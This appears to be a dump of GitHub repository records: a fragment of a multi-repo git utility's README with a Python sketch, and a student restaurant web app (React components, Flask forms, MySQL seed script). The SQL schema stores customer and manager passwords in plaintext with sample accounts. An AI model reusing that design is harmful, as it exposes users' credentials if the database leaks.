"01bfe2280624e4ce0591131b6439c869facdbc3e", "content_id": "a89591291799c93d13bde38d8713c96e755ddb8b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 661, "license_type": "permissive", "max_line_length": 105, "num_lines": 22, "path": "/README.md", "repo_name": "softagram/allrepos-utility", "src_encoding": "UTF-8", "text": "# allrepos.py: get stuff done with 100x git repo directories\n\nUtility for working with multiple repos when repos have been placed in a single top level dir\n\n# Couple of example use cases\n\n## Run fetch for all\n`python allrepos.py fetch`\n\n## Get default branches\n`python allrepos.py symbolic-ref refs/remotes/origin/HEAD | sed 's@^refs/remotes/origin/@ @'`\n\n## Delete all branches with name foo from remotes:\n`python allrepos.py ls-remote --exit-code --heads origin foo IF_OK_EXECUTE_ALSO push origin --delete foo`\n\n\n\n# Requirements\n- Python 3.6+ since uses f-strings.\n- Git.\n\nNote: the examples here involve usage of unix tools, but this is not limited to unix.\n" } ]
2
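allrepos.py above builds one shell string per repository and chains the optional IF_OK_EXECUTE_ALSO command with &&. An equivalent sketch using subprocess argument lists and return codes instead of shell strings, matching the README's examples (the function name and signature are my own):

import os
import subprocess

def run_in_repos(args, then=None):
    # Mirror allrepos.py: every child directory with a .git folder is a repo.
    for fn in sorted(os.listdir('.')):
        if os.path.isdir(fn) and os.path.exists(os.path.join(fn, '.git')):
            print(fn)
            ok = subprocess.call(['git', '-C', fn] + list(args)) == 0
            if ok and then:
                # IF_OK_EXECUTE_ALSO behaviour: follow-up runs only on success.
                subprocess.call(['git', '-C', fn] + list(then))

# run_in_repos(['fetch'])
# run_in_repos(['ls-remote', '--exit-code', '--heads', 'origin', 'foo'],
#              then=['push', 'origin', '--delete', 'foo'])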
akash395/Foodinit
https://github.com/akash395/Foodinit
034133d16d5b9d261ec254c5250df787808f3d4f
60eed7f0b82b3003c9144b76968bb139c59c987d
5011a03aa566855e923b05e8f6b6e91f4fdb0cae
refs/heads/main
2023-02-06T11:01:57.824842
2020-12-29T03:59:08
2020-12-29T03:59:08
325,179,540
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.491150438785553, "alphanum_fraction": 0.6681416034698486, "avg_line_length": 16.83333396911621, "blob_id": "076d181cf29efea31056a59838fe9a3f369e8d78", "content_id": "744e98cdc1ff46fada384d5f36d0eac1674a9cf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 226, "license_type": "no_license", "max_line_length": 23, "num_lines": 12, "path": "/flaskapp/requirements.txt", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "click==7.1.2\r\nFlask==1.1.2\r\nFlask-MySQLdb==0.2.0\r\nFlask-SQLAlchemy==2.4.4\r\nitsdangerous==1.1.0\r\nJinja2==2.11.2\r\nMarkupSafe==1.1.1\r\nmysqlclient==2.0.1\r\npython-dotenv==0.15.0\r\nPyYAML==5.3.1\r\nSQLAlchemy==1.3.20\r\nWerkzeug==1.0.1\r\n" }, { "alpha_fraction": 0.5244003534317017, "alphanum_fraction": 0.5442514419555664, "avg_line_length": 34.55882263183594, "blob_id": "ccb9e762fdb79323471dd7d4d60d5e76c9ce5440", "content_id": "35bcd7d2418661418866aae4d5e3ab8e5f24e8c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1209, "license_type": "no_license", "max_line_length": 129, "num_lines": 34, "path": "/src/components/About.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react'\nimport {Link} from 'react-router-dom'\nimport Shrimp_tempura from './../images/Shrimp_tempura.jpg'\nimport Caeser_salad from './../images/Caeser_salad.jpg'\nimport ONLINE_FOOD from './../images/ONLINE_FOOD.jpg'\n\nfunction About() {\n return (\n <div>\n <center><br/><br/>\n <h3 className=\"H3class\">About Us</h3>\n <h2>Welcome to FoodInIt. FoodInIt was created to provide a greater quality in food that will satisfy consumers. <br/>\n Food can be delivered right to your doorstep or you can simply pick it up here. <br/>\n We strive to provide the utmost quality and hope that everyone is satisfied with our food! 
<br/>\n </h2>\n <br/>\n <br/>\n <img src = {Shrimp_tempura}></img>\n <img src = {Caeser_salad}></img>\n </center>\n <br/>\n <div className = \"container\" id = \"section-2-gradient\">\n\n <h2 className=\"large\">Business Hours:</h2>\n <h3>Mon - Fri:\t7:00 AM - 11:00 PM <br/>\n Sat & Sun:\t6:00 AM - 11:00 PM <br/>\n </h3>\n </div>\n </div>\n )\n}\n\n\nexport default About\n" }, { "alpha_fraction": 0.3732227385044098, "alphanum_fraction": 0.3850710988044739, "avg_line_length": 24.836734771728516, "blob_id": "a98f587b1fc0f0b0275edcbfaad6c8898848a27a", "content_id": "8421dc4d2361eed3b6ecf5e0efa5e85aff8c4baa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2532, "license_type": "no_license", "max_line_length": 61, "num_lines": 98, "path": "/src/components/Breakfast.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react'\nimport FoodProfile from './FoodProfile'\nimport Bacon_wrap from './../images/Bacon_wrap.jpg'\nimport Bagel_cc from './../images/Bagel_cc.jpg'\nimport French_slam from './../images/French_slam.jpg'\nimport Ham_croissant from './../images/Ham_croissant.jpg'\nimport Muffin from './../images/Muffin.jpg'\nimport Pancake from './../images/Pancake.jpg'\nimport Sausage_burrito from './../images/Sausage_burrito.jpg'\nimport Veggie_omelet from './../images/Veggie_omelet.jpg'\nimport Waffle from './../images/Waffle.jpg'\n\nfunction Breakfast() {\n return (\n <div>\n <div className=\"row\">\n <div className=\".col-4\">\n <FoodProfile \n imgUrl = {Bacon_wrap} \n name = \"Bacon Wrap\"\n price = \"$5.50\"\n />\n <br />\n <br />\n \n <FoodProfile \n imgUrl = {Bagel_cc}\n name = \" Bagel Cream Cheese\"\n price = \"$3.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {French_slam}\n name = \"French Slam\"\n price = \"$7.75\"\n />\n\n\n </div>\n <div className=\".col-4\">\n <br></br>\n \n <FoodProfile \n imgUrl = {Ham_croissant}\n name = \"Ham Croissant\"\n price = \"$9.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Muffin}\n name = \"Muffin\"\n price = \"$3.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Pancake}\n name = \"Pancake\"\n price = \"$9.75\"\n />\n\n </div>\n <div className=\".col-4\">\n <br></br>\n <FoodProfile \n imgUrl = {Sausage_burrito}\n name = \"Sausage Burrito\"\n price = \"$8.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Veggie_omelet}\n name = \" Veggie Omelet\"\n price = \"$5.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Waffle}\n name = \"Waffle\"\n price = \"$7.75\"\n />\n\n </div>\n </div>\n </div>\n )\n}\n\nexport default Breakfast\n" }, { "alpha_fraction": 0.36938369274139404, "alphanum_fraction": 0.38687872886657715, "avg_line_length": 30.8354434967041, "blob_id": "d0baf35db185117024a511c1469d8c581d4b86ac", "content_id": "4b2edf33bdfb38ba20db415af6d019be100fbc69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2515, "license_type": "no_license", "max_line_length": 102, "num_lines": 79, "path": "/src/components/ManagerPage.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React, { Component } from 'react'\nimport {BrowserRouter as Router, Switch, Route} from 'react-router-dom'\nimport ManagerLoginForm from './ManagerLoginForm'\nimport \"./../App.css\"\n\nexport class ManagerPage extends Component {\n constructor (){\n super ();\n this.state = {\n employees : [],\n isChecked: false\n }\n 
}\n\n template (args){\n return (\n <p>args</p>\n )\n }\n\n componentDidMount(){\n const apiUrl = \"/getemployeerecords\";\n let record = this.state.employees;\n fetch(apiUrl)\n .then (response => response.json())\n .then (data => this.setState({\n employees: data\n }))\n }\n\n \n render() { \n const tableStyle = {\n border: '1px solid black'\n }\n return (\n <div className=\"row\">\n <div className=\".col-9\">\n <h2 style = {{color: 'blue'}}>View Employee records</h2>\n <table style = {{width:\"100%\"}} className=\"uppertable\">\n <tr style = {{color : 'teal'}}>\n <th style = {{width:\"100%\"}}>Employee_id</th>\n <th style = {{width:\"100%\"}}>First Name</th> \n <th style = {{width:\"100%\"}}>Last Name</th> \n <th style = {{width:\"100%\"}}>Position</th> \n <th style = {{width:\"100%\"}}>Salary</th>\n </tr>\n </table>\n\n <p>{this.state.employees.map (record => (\n\n <table style ={{width:\"50%\"}} >\n \n <tr>\n\n <th className=\"EmployeeRecords\">\n <td style = {{width:\"15%\"}}>{record[0]}</td>\n <td style = {{width:\"25%\"}}>{record[1]}</td>\n <td style = {{width:\"15%\"}}>{record[2]}</td>\n <td style = {{width:\"20%\"}}>{record[3]}</td>\n <td style = {{width:\"5%\"}} >{record[4]}</td>\n {/* <p>{record[0]} {record[1]} {record[2]} {record[3]} {record[4]}</p> */}\n </th>\n \n </tr>\n\n </table>\n ))}\n </p>\n </div>\n <div className=\".col-3\">\n \n </div>\n </div>\n )\n }\n}\n\nexport default ManagerPage\n" }, { "alpha_fraction": 0.43451568484306335, "alphanum_fraction": 0.44065484404563904, "avg_line_length": 33.904762268066406, "blob_id": "356a3e5e9aaad7741f82f7ac48725f43bc75a3ab", "content_id": "29919501c830a23677a2d7703e81389d5a09ddc7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1466, "license_type": "no_license", "max_line_length": 115, "num_lines": 42, "path": "/src/components/ContactUs.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React, { Component } from \"react\";\n\nexport default class ContactUs extends Component {\n constructor (){\n super ();\n this.state = {\n clickedSubmit: 0,\n }\n }\n render() {\n return (\n <div className=\"Container1\">\n <form action = 'http://localhost:5000/contactus' method = 'post'>\n <h3 className = \"H3class\">Contact Us</h3>\n\n <div className=\"form-group\">\n <label>Full Name</label> \n <input type=\"text\" className=\"form-control\" placeholder=\"Enter Full Name\" name = \"full name\" />\n </div>\n <br></br>\n <div className=\"form-group\">\n <label>Email</label>\n <input type=\"email\" className=\"form-control\" placeholder=\"Enter Email\" name = \"email\" />\n \n </div>\n <br></br>\n <div className=\"form-group\">\n <div className=\"form-group\">\n <label>Message</label> \n <input type=\"text\" className=\"form-control\" placeholder=\"Type your message\" name = \"message\" />\n </div>\n </div>\n <br></br>\n <br></br>\n <button type=\"submit\" className=\"SubmitBtn\">Submit</button>\n <br></br>\n <br></br>\n </form>\n </div>\n );\n }\n}\n" }, { "alpha_fraction": 0.4642857015132904, "alphanum_fraction": 0.7928571701049805, "avg_line_length": 139, "blob_id": "2a376c0a88f170680326b007deb0d28c2a458091", "content_id": "ef73622c5b311d2f87332efba61e4f2667a6a7a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 140, "license_type": "no_license", "max_line_length": 139, "num_lines": 1, "path": "/Reports/OverallCollaborationDiagram.md", "repo_name": "akash395/Foodinit", "src_encoding": 
"UTF-8", "text": "<img src=\"https://user-images.githubusercontent.com/38135805/99490266-836f9480-2937-11eb-8fbb-f21d08312dd5.png\" width=\"1510\" height=\"1650\">\n" }, { "alpha_fraction": 0.7689433097839355, "alphanum_fraction": 0.7749636769294739, "avg_line_length": 61.558441162109375, "blob_id": "acafea59b2bb40218dd2156726b17ebf0bb96d83", "content_id": "18df267eb3685c35552c1f74067a2bc86fab889a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4817, "license_type": "no_license", "max_line_length": 465, "num_lines": 77, "path": "/README.md", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "# To run the online restaurant project: CSC322 Software Engineering\n\n### Extra Details\n- Languages Used: Python, CSS, Javascript, HTML\n- Also Used: Flask, MySQL\n\n### Instructions\n\n1. Install Node.js from https://nodejs.org/en/\n2. Install Git from https://git-scm.com/\n3. Open a terminal, and go to desired directory.\n4. git clone https://github.com/myumbla3/OnlineRestaurant.git\n5. npm install (for installing dependencies for frontend)\n6. make a virtual environment to download all python dependencies\n7. activate that environment\n8. pip install -r requirements.txt (found in src->flaskapp folder)\n9. For Foodinit.sql, this file is used for MYSQL Workbench, which you also need to install for the database\n to work. Set accounts have been created to allow the user to sign in successfully\n10. once all dependencies are installed type python app.py\n![App](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/app.png)\n\n11. Then in another terminal, type:npm start, which will open up a browser in localhost for you to access the websites\n![npm](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/npm.png)\n\n### Home Page\n![Home](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/home.png)\n\n- This is the home page for the website where a video displays food and there is a navigation bar at the top of the website where you can navigate to\n the various parts of the website, including the menu, signing in, contacting us, etc.\n\n### Menu Page\n![Menu](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/Menu.png)\n\n- The top picks food are displayed at the front of the Menu, and there is the feature to add any of the to the cart, but that feature isn't working right now.\n On the left hand side of the page, there is a trigram in which you can click and it will display the various options of food provided, whether it be\n Breakfast, Lunch, Dinner, Specials, etc.\n \n - Breakfast\n ![Breakfast](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/Breakfast.png)\n \n - Lunch\n ![Lunch](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/lunch.png)\n \n - Dinner\n ![Dinner](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/Dinner.png)\n \n### Admin Page\n![Admin](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/admin.png)\n\n- This is the Admin page where the Managers will sign in instead of the usual sign in method.\n\n#### Requirements\n![Req](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/AdminReq.png)\n\n- If you don't implement anything within the text boxes, then there wil be a red ring around the text boxes and text indicating that\n you did not meet the requirements to log in.\n \n#### Token Acceptance\n![Token](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/token.png)\n\n- This token 
indicates that when you sign in through admin, you have successfully signed in. The manager is now within the database. We tried to fix the token, but\n  it didn't work properly and just displayed the token as one string of text.\n\n### Sign In Page\n![SignIn](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/SignIn.png)\n\n![SignError](https://github.com/myumbla3/OnlineRestaurant/blob/main/RImages/signerror.png)\n\n- There are problems within the sql file itself. If you type in any of the Customer Values on the Sign In Page,\n  it will allow you to successfully sign in to the website itself. However, we lacked enough back end skills\n  to differentiate a registered customer, vip customer and guest surfer. Vip customers would've had a \n  specialized menu catered to their preferences, and registered customers would've been redirected to the top picks in the menu. We also tried to use escape_string from\n  MySQLdb in order to redirect the VIP and Registered customers to different pages based on their deposit funds.\n \n- Unfortunately, we realize that we should've focused more of our time on the back end first, and added the front end afterwards. The back end is more important to work on since that is where\n  all the information is stored. Since this is a first for all of us, we were lost on how to start. Once we did start, we encountered various problems with our machines. A lot of precious time was spent on debugging the problem of how to get things up and running before actually coding. As mentioned previously, we spent a lot of time with tutorials learning new things and information on how to do this kind of project rather than starting our own version of it. \nThrough this project we learned our strengths and weaknesses and what areas we need to improve on. We got valuable experience on how to tackle this type of project and situation in a real-world job. 
We all learned from our mistakes and hopefully we can avoid this kind of behavior in the job field.\n" }, { "alpha_fraction": 0.6632001996040344, "alphanum_fraction": 0.7073977589607239, "avg_line_length": 37.825687408447266, "blob_id": "faabed451bc1b4139837ab479b91bfed11625b35", "content_id": "b941c58ea6d45815d00204413efac428ac9d24f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 4231, "license_type": "no_license", "max_line_length": 98, "num_lines": 109, "path": "/foodinit.sql", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "USE FOODINIT;\r\n\r\nCREATE TABLE IF NOT EXISTS Customer (\r\n\tcustomer_id INT AUTO_INCREMENT PRIMARY KEY,\r\n    first_Name VARCHAR (30) NOT NULL,\r\n    last_name VARCHAR (30) NOT NULL,\r\n    phone VARCHAR (10) NOT NULL,\r\n    funds DECIMAL (10,2) NOT NULL,\r\n    total_spendings DECIMAL (10,2) NOT NULL,\r\n    email_id VARCHAR (50) NOT NULL,\r\n    pass VARCHAR (20) NOT NULL,\r\n    CHECK (length(pass) >= 8),\r\n    vip_status VARCHAR (3) NOT NULL DEFAULT 'no' -- default assumed; the INSERTs below do not set vip_status\r\n);\r\n-- DROP TABLE Customer; -- leftover interactive statement; dropping here would break the INSERTs below\r\nINSERT INTO Customer (\r\n\tcustomer_id, first_name, \r\n    last_name, phone, funds, \r\n    total_spendings, email_id,\r\n    pass\r\n)\r\nVALUES (1, 'Mumtahid', 'Akash', '9294353796', 35, 0, '[email protected]', 'a1b2c3d4');\r\nINSERT INTO Customer (\r\n\tcustomer_id, first_name, \r\n    last_name, phone, funds, \r\n    total_spendings, email_id,\r\n    pass\r\n)\r\nVALUES (2, 'MD', 'Hossain', '9175184400', 15, 10, '[email protected]', 'ABCDEFGH');\r\nINSERT INTO Customer (\r\n\tcustomer_id, first_name, \r\n    last_name, phone, funds, \r\n    total_spendings, email_id,\r\n    pass\r\n)\r\nVALUES (3, 'Sajid', 'Mahmud', '6465451125', 65, 80, '[email protected]', '12345678');\r\nINSERT INTO Customer (\r\n\t first_name, \r\n    last_name, phone, funds, \r\n    total_spendings, email_id,\r\n    pass\r\n)\r\nVALUES ('Anvinh', 'Mahmud', '6465451125', 65, 80, '[email protected]', '12345678');\r\nINSERT INTO Customer (\r\n\t first_name, \r\n    last_name, phone, funds, \r\n    total_spendings, email_id,\r\n    pass\r\n)\r\nVALUES ('Myriam', 'yumbla', '9294267390', 15, 10, '[email protected]', '3q445casFf');\r\n\r\nCREATE TABLE IF NOT EXISTS Customer_Address (\r\n\taddress_id INT AUTO_INCREMENT PRIMARY KEY,\r\n    street_address VARCHAR (50) NOT NULL,\r\n    zipcode INT NOT NULL,\r\n    state CHAR (2) NOT NULL,\r\n    customer_id INT,\r\n    FOREIGN KEY (customer_id) REFERENCES Customer (customer_id)\r\n);\r\n-- DROP TABLE Customer_address;\r\n\r\nCREATE TABLE IF NOT EXISTS Manager (\r\n\tmanager_id INT AUTO_INCREMENT PRIMARY KEY ,\r\n    manager_first_name VARCHAR (20) NOT NULL,\r\n    manager_last_name VARCHAR (20) NOT NULL,\r\n    manager_email VARCHAR (50) NOT NULL,\r\n    manager_password VARCHAR (20) NOT NULL,\r\n    CHECK (length (manager_password) >= 8)\r\n    );\r\n-- DROP TABLE Manager;\r\n\r\nINSERT INTO Manager (manager_first_name, manager_last_name, manager_email, manager_password)\r\nVALUES ('Sakai', 'Gin', '[email protected]', 'sakaigin1');\r\nINSERT INTO Manager (manager_first_name, manager_last_name, manager_email, manager_password)\r\nVALUES ('Sakata', 'Gintoki', '[email protected]', 'sakaigintoki1');\r\n\r\nCREATE TABLE IF NOT EXISTS Employee (\r\n\temployee_id INT AUTO_INCREMENT PRIMARY KEY,\r\n    employee_first_name VARCHAR (20) NOT NULL,\r\n    employee_last_name VARCHAR (20) NOT NULL,\r\n    employee_position VARCHAR (20) NOT NULL,\r\n    employee_salary INT NOT NULL\r\n);\r\n-- DROP TABLE Employee;\r\n\r\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\r\nVALUES ('Sakurajima', 'Mai', 'Chef', 25000);\r\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\r\nVALUES ('Vinsmoke', 'Sanji', 
'Chef', 45000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Anos', 'Voldigoad', 'Delivery Person', 10000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Mao', 'Sama', 'Cashier', 15000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Sakura', 'Matou', 'Chef', 30000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Nasa', 'Yuzaki', 'Cashier', 10000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Roronoa', 'Zoro', 'Janitor', 20000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Saeko', 'Busujima', 'Waiter', 55000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Okabe', 'Rintarou', 'Waiter', 50000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Jason', 'Bourne', 'Waiter', 60000);\nINSERT INTO Employee (employee_first_name, employee_last_name, employee_position, employee_salary)\nVALUES ('Kara', 'Zor el', 'Waiter', 60000);\n\nSELECT * FROM Employee" }, { "alpha_fraction": 0.4790187180042267, "alphanum_fraction": 0.48676565289497375, "avg_line_length": 36.682926177978516, "blob_id": "2114685fa0abf7d3af9f5a025bc149f043c105e6", "content_id": "fce604e33f0b22056d16cd0626ef0b9d26e8ebe0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1549, "license_type": "no_license", "max_line_length": 118, "num_lines": 41, "path": "/src/components/SignUp.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react'\n\nfunction SignUp() {\n\n return (\n\n <div className=\"Container2\">\n <form action = 'http://localhost:5000/signup' method = 'post'>\n <h3 className=\"H3class\">Sign Up</h3>\n\n <div className=\"form-group\">\n <label>First name</label><br></br>\n <input type=\"text\" className=\"form-control\" placeholder=\"First name\" name = 'fname' />\n </div>\n\n <div className=\"form-group\">\n <label>Last name</label><br></br>\n <input type=\"text\" className=\"form-control\" placeholder=\"Last name\" name= 'lname'/>\n </div>\n\n <div className=\"form-group\">\n <label>Email address</label><br></br>\n <input type=\"email\" className=\"form-control\" placeholder=\"Enter email\" name = 'email'/>\n </div>\n\n <div className=\"form-group\">\n <label>Password</label><br></br>\n <input type=\"password\" className=\"form-control\" placeholder=\"Enter password\" name = 'password'/>\n </div>\n <br></br><br></br>\n <button type=\"submit\" className=\"SignUpBtn\">Sign Up</button><br></br><br></br>\n <p className=\"forgot-password text-right\">\n Already registered? 
<a href=\"http://localhost:3000/signin\"> sign in</a>\n </p>\n \n </form>\n </div>\n )\n}\n\nexport default SignUp\n\n\n\n\n" }, { "alpha_fraction": 0.4809116721153259, "alphanum_fraction": 0.4923076927661896, "avg_line_length": 38, "blob_id": "42a0672c00a98eea8459ae669f9104381e73f495", "content_id": "30578090cfa6c0cb60cf28d4ff6980f3af75a49d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1755, "license_type": "no_license", "max_line_length": 235, "num_lines": 45, "path": "/src/components/Home.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React, { Component } from \"react\";\nimport {Link} from 'react-router-dom'\nimport Bacon_wrap from './../images/Bacon_wrap.jpg'\nimport Smoke_salmon from './../images/Smoke_salmon.jpg'\nimport Truffle_gnocchi from './../images/Truffle_gnocchi.jpg'\n\n\nexport default class Home extends Component {\n render() {\n return (\n\n <div> \n <div className=\"container\" id=\"section-1-gradient\">\n \n <h1 className=\"justheading\"><center>FoodInIt</center></h1> \n <div className =\"row\">\n <div className=\"col-6\">\n <div className=\"leftside-col\">\n <h1 className=\"large\">Easy Access</h1>\n <h1 className=\"large\">Made for Food lovers</h1>\n \n </div>\n </div>\n </div>\n <div className=\"col-6\">\n <div className=\"videoMargin\">\n <div className=\"videoContainer\"> \n <iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/rzNXJ9w_Zhs\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>\n </div>\n </div>\n </div>\n </div>\n\n <div className = \"container\" id = \"section-2-gradient\">\n <h1>Choose foods that range all the way from Breakfast to Dinner!</h1>\n <center>\n <img src = {Bacon_wrap}></img>\n <img src = {Smoke_salmon}></img>\n <img src = {Truffle_gnocchi}></img>\n </center>\n </div>\n </div> \n );\n }\n}\n" }, { "alpha_fraction": 0.39059537649154663, "alphanum_fraction": 0.4019719362258911, "avg_line_length": 25.636363983154297, "blob_id": "99e21b9cbb6ff5eaeb934db630f5896da57699d2", "content_id": "f7b27f23c87c81f4f4942ba020224b7f8838bb9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2637, "license_type": "no_license", "max_line_length": 63, "num_lines": 99, "path": "/src/components/Beverages.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react'\nimport FoodProfile from './FoodProfile'\nimport Green_icedtea from './../images/Green_icedtea.jpg'\nimport Lemonade from './../images/Lemonade.jpg'\nimport Mango_lassi from './../images/Mango_lassi.jpg'\nimport Matcha_latte from './../images/Matcha_latte.jpg'\nimport Orange_juice from './../images/Orange_juice.jpg'\nimport Pina_colada from './../images/Pina_colada.jpg'\nimport Pineapple_lassi from './../images/Pineapple_lassi.jpg'\nimport Strawberry_shake from './../images/Strawberry_shake.jpg'\nimport Thai_icedtea from './../images/Thai_icedtea.jpg'\n\nfunction Beverages() {\n return (\n <div>\n \n <div className=\"row\">\n <div className=\".col-4\">\n <FoodProfile \n imgUrl = {Green_icedtea} \n name = \"Green Icedtea\"\n price = \"$7.75\"\n />\n <br />\n <br />\n \n <FoodProfile \n imgUrl = {Lemonade}\n name = \" Lemonade\"\n price = \"$4.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Mango_lassi}\n name = \" Mango Lassi\"\n price = \"$9.75\"\n />\n\n\n </div>\n <div 
className=\".col-4\">\n <br></br>\n \n <FoodProfile \n imgUrl = {Matcha_latte}\n name = \"Matcha Latte\"\n price = \"$9.99\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Orange_juice}\n name = \"Orange Juice\"\n price = \"$3.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Pina_colada}\n name = \"Pina Colada\"\n price = \"$9.75\"\n />\n\n </div>\n <div className=\".col-4\">\n <br></br>\n <FoodProfile \n imgUrl = {Pineapple_lassi}\n name = \"Pineapple Lassi\"\n price = \"$9.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Strawberry_shake}\n name = \" Strawberry Shake\"\n price = \"$9.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Thai_icedtea}\n name = \"Thai Icedtea\"\n price = \"$7.75\"\n />\n\n </div>\n </div>\n </div>\n )\n}\n\nexport default Beverages\n" }, { "alpha_fraction": 0.44233378767967224, "alphanum_fraction": 0.4464043378829956, "avg_line_length": 22.80645179748535, "blob_id": "a3148a7b8dfdee9771fe28b695a8d28b7eb7eec0", "content_id": "e960e4626f1b2406e5014c4498241c295ceef3f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 737, "license_type": "no_license", "max_line_length": 82, "num_lines": 31, "path": "/src/components/FoodProfile.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React, {useState} from 'react'\nimport Ratings from './Ratings'\n\nfunction FoodProfile(props) {\n const imgStyle = {\n position:'relative',\n left: '170px'\n\n }\n const [bag, setBag] = useState ([])\n\n\n return (\n <div>\n <img \n src = {props.imgUrl} \n style = {imgStyle}\n />\n <p style = {imgStyle}> {props.name} {props.price}</p>\n <table>\n <tr>\n <th><div className=\"ratting\"> <Ratings/></div></th>\n <th><button className=\"AddtocartBtn\">Add to cart</button></th>\n </tr> \n </table>\n \n </div>\n )\n}\n\nexport default FoodProfile" }, { "alpha_fraction": 0.5613718628883362, "alphanum_fraction": 0.5613718628883362, "avg_line_length": 28.052631378173828, "blob_id": "58517618d7d792995005616b3de8255a3515e8a5", "content_id": "f5687f02e56274d044200e4a76ec56bf87524d47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 554, "license_type": "no_license", "max_line_length": 81, "num_lines": 19, "path": "/src/components/ProtectedRoute.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React, { useContext } from \"react\";\nimport { Redirect, Route } from \"react-router-dom\";\nimport { AuthContext } from \"./auth\";\n\n\n// This accepts Component as a prop and all other props of that component as rest\nexport const ProtectedRoute = ({ component: Component, ...rest }) => {\n const { token } = useContext (AuthContext)\n\n return (\n <Route {...rest} render = {(props) => \n token ? 
(\n // <Component {...props} />\n <Redirect to = '/records' />\n ): (\n <Redirect to = '/admin' />\n )}/>\n );\n };\n " }, { "alpha_fraction": 0.45943397283554077, "alphanum_fraction": 0.46226415038108826, "avg_line_length": 20.219999313354492, "blob_id": "a4edb2a41980e1ff0cff103d69920729a6ca4772", "content_id": "3e00526f6c82176835436c1609db7b2233b99818", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1060, "license_type": "no_license", "max_line_length": 52, "num_lines": 50, "path": "/src/components/Sidebar.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport {Link} from 'react-router-dom'\nimport { elastic as Menu } from 'react-burger-menu';\nimport './../App.css'\nimport './../Sidebar.css'\n\nexport default props => {\n return (\n <Menu width = {150}>\n <Link to = '/appetizer'>\n <a className=\"menu-item\" href=\"/appetizer\">\n Appetizer\n </a>\n </Link>\n \n <Link to = '/breakfast'>\n <a className=\"menu-item\" href=\"/breakfast\">\n Breakfast\n </a>\n </Link>\n \n <Link to = '/lunch'>\n <a className=\"menu-item\" href=\"/lunch\">\n Lunch\n </a>\n </Link>\n \n <Link to = 